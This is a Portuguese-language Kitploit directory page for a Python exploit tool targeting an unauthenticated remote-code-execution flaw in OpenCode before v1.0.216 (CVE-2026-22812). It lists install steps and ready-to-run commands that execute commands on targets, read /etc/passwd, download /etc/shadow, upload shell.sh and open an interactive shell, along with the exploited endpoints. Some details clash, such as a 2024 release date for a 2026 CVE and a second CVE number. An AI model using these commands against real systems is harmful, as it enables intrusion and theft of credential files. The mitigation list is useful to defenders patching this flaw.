Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22812 — Ferramenta de exploração em Python para RCE no OpenCode (CVE-2026-22812) que fornece execução de comandos, leitura/escrita/carregamento/baixamento de arquivos e shell interativo para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Ferramenta de exploração em Python para RCE no OpenCode (CVE-2026-22812) que fornece execução de comandos, leitura/escrita/carregamento/baixamento de arquivos e shell interativo para testes de penetração autorizados.

Ver Repositório
21há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22812

Visão Geral

Uma ferramenta de exploração em Python para a vulnerabilidade de Execução Remota de Código (RCE) no OpenCode que afeta versões < v1.0.216. Esta ferramenta fornece múltiplos vetores de ataque, incluindo execução de comandos, leitura/escrita de arquivos, upload/download de arquivos e shell interativo.

Aviso Legal

⚠️ SOMENTE PARA TESTES AUTORIZADOS ⚠️

  • Esta ferramenta destina-se exclusivamente a testes legítimos de segurança e testes de penetração autorizados
  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar
  • O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta
  • O acesso não autorizado a sistemas de computador é ilegal e punível por lei

Recursos

  • Detecção de Vulnerabilidade: Verifica se o alvo é vulnerável
  • Execução de Comandos: Executa comandos arbitrários no alvo
  • Operações com Arquivos: Ler, escrever, enviar e baixar arquivos
  • Shell Interativo: Shell interativo completo com autocompletar por tabulação
  • Reconhecimento do Sistema: Coleta informações do sistema
  • Suporte a Proxy: Roteia o tráfego através de proxy HTTP
  • Rastreamento de Estatísticas: Monitora atividades de exploração

Instalação

root@kitploit:~
# Clonar repositório
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# Instalar dependências
pip install requests urllib3

# Tornar executável (opcional)
chmod +x CVE-2026-22812.py

Requisitos

  • Python 3.6+
  • Biblioteca requests
  • Biblioteca urllib3

Uso

root@kitploit:~
python3 CVE-2026-22812.py -t http://alvo:porta [opções]

Exemplos Básicos

root@kitploit:~
# Verificar se o alvo é vulnerável
python3 exploit.py -t http://10.0.0.1:4096 --check

# Shell interativo
python3 exploit.py -t http://10.0.0.1:4096 -i

# Executar comando único
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# Ler arquivo
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# Enviar arquivo
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# Baixar arquivo
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# Obter informações do sistema
python3 exploit.py -t http://10.0.0.1:4096 --info

# Usar proxy (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

Comandos do Shell Interativo

Uma vez no shell interativo (flag -i), você pode usar:

root@kitploit:~
<comando>                   Executar comando do shell
help                       Mostrar menu de ajuda
exit                       Sair do shell
session                    Mostrar ID da sessão
stats                      Mostrar estatísticas de exploração
read <arquivo>             Ler conteúdo do arquivo
download <remoto> <local>  Baixar arquivo
upload <local> <remoto>    Enviar arquivo
sysinfo                    Obter informações do sistema

Detalhes da Vulnerabilidade

  • ID CVE: CVE-2026-22812 / CVE-2026-22182
  • Produto: OpenCode
  • Versões Afetadas: < v1.0.216
  • Tipo de Vulnerabilidade: Execução Remota de Código
  • Vetor de Ataque: Rede
  • Autenticação: Não necessária

Detalhes Técnicos

A vulnerabilidade existe no endpoint de gerenciamento de sessão (/session) que permite que usuários não autenticados criem sessões e executem comandos arbitrários através do endpoint /session/{id}/shell.

Endpoints Explorados:

  1. POST /session - Criar sessão
  2. POST /session/{id}/shell - Executar comandos
  3. GET /file/content - Ler arquivos

Mitigação

  1. Atualize o OpenCode para versão ≥ v1.0.216
  2. Implemente autenticação e autorização adequadas
  3. Restrinja o acesso de rede às instâncias do OpenCode
  4. Implemente validação e sanitização de entrada
  5. Use Firewall de Aplicação Web (WAF)

Estrutura do Código

root@kitploit:~
CVE-2026-22812.py
├── Classe Colors (códigos de cor ANSI)
├── print_banner() (Exibir banner)
├── Classe Exploit (Lógica principal de exploração)
│   ├── __init__() (Inicialização)
│   ├── check_vuln() (Verificação de vulnerabilidade)
│   ├── create_session() (Criar sessão)
│   ├── exec_cmd() (Executar comando)
│   ├── read_file() (Ler arquivo)
│   ├── write_file() (Escrever arquivo)
│   ├── upload() (Enviar arquivo)
│   ├── download() (Baixar arquivo)
│   ├── get_info() (Informações do sistema)
│   ├── shell() (Shell interativo)
│   └── Métodos auxiliares
└── main() (Análise de argumentos)

Licença

Esta ferramenta é disponibilizada apenas para fins educacionais. Use por sua conta e risco.

Autor

  • GitHub: 0xgh057r3c0n
  • Ferramenta: Ferramenta de Exploração CVE-2026-22812

Contribuindo

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Faça commit das suas alterações
  4. Envie para o branch
  5. Crie um Pull Request

Agradecimentos

  • Pesquisadores de segurança que descobriram a vulnerabilidade
  • Comunidade de código aberto
  • Todos os contribuidores e testadores

Referências

  • Aviso de Segurança do OpenCode
  • Banco de Dados CVE
  • Entrada NVD

Suporte

Para problemas e dúvidas, por favor:

  1. Verifique os problemas existentes no GitHub
  2. Crie um novo problema com descrição detalhada
  3. Inclua a URL do alvo (se possível) e mensagens de erro

Histórico de Versões

  • v1.0.0 (2024-01-20): Lançamento inicial
    • Detecção de vulnerabilidade
    • Execução de comandos
    • Operações com arquivos
    • Shell interativo
    • Suporte a proxy
Baixar ferramenta